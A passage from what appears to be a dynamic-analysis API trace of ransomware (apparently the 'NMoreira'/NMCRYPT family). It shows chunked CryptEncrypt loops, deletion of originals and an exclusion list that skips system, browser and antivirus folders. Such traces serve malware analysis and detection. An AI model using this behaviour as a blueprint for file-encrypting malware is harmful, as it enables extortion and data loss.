nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.091] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.091] GetLastError () returned 0x0 [0166.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.091] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.091] GetLastError () returned 0x0 [0166.091] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.091] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.092] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.092] GetLastError () returned 0x0 [0166.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.092] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.092] GetLastError () returned 0x0 [0166.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.092] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.092] GetLastError () returned 0x0 [0166.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.092] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.092] GetLastError () returned 0x0 [0166.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.092] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.092] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.092] GetLastError () returned 0x0 [0166.092] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.093] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.093] GetLastError () returned 0x0 [0166.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.093] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.093] GetLastError () returned 0x0 [0166.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.093] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.093] GetLastError () returned 0x0 [0166.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.093] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.093] GetLastError () returned 0x0 [0166.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.093] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.093] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.093] GetLastError () returned 0x0 [0166.093] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.094] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.094] GetLastError () returned 0x0 [0166.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.094] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.094] GetLastError () returned 0x0 [0166.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.094] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.094] GetLastError () returned 0x0 [0166.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.094] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.094] GetLastError () returned 0x0 [0166.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.094] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.094] GetLastError () returned 0x0 [0166.094] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.094] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x49, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x49, lpOverlapped=0x0) returned 1 [0166.095] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x49, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x50) returned 1 [0166.095] GetLastError () returned 0x0 [0166.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x50, lpOverlapped=0x0) returned 1 [0166.095] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.095] WriteFile (in: hFile=0x15c4, lpBuffer=0x2891f68*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.095] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned 1 [0166.095] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg")) returned 0 [0166.096] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" [0166.096] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.096] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFC4C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfc4c.tmp")) returned 0xfc4c [0166.096] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFC4C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfc4c.tmp"), dwFlags=0x1) returned 0 [0166.096] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFC4C.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfc4c.tmp")) returned 1 [0166.097] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0166.097] wcslen (_String="OK") returned 0x2 [0166.097] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.097] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.097] CryptDestroyKey (hKey=0x9ad278) returned 1 [0166.097] CryptDestroyHash (hHash=0x9ad1f8) returned 1 [0166.097] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*NMCRYPT") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*Recovers your files.html") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*.exe") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*.dll") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*.lnk") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*.bat") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*.ini") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*.msi") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*.scf") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*pagefile.sys*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*NTUSER.DAT*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*AppData*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\winrar\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\java\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\windows\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\ESET\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\AVG\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\AVIRA\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*Atheros*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*Realtek*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*bootmgr*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*boot*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*boot*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*CONFIG.SYS*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*IO.SYS*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*MSDOS.SYS*") returned 0 [0166.097] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*NTDETECT.COM*") returned 0 [0166.098] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*ntldr*") returned 0 [0166.098] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*chrome*") returned 0 [0166.098] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*opera*") returned 0 [0166.098] PathMatchSpecW (pszFile="Stars.htm", pszSpec="*firefox*") returned 0 [0166.098] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm", pszSpec="*") returned 1 [0166.098] strlen (_Str="NMoreira") returned 0x8 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.098] CryptGenRandom (in: hProv=0x8bf310, 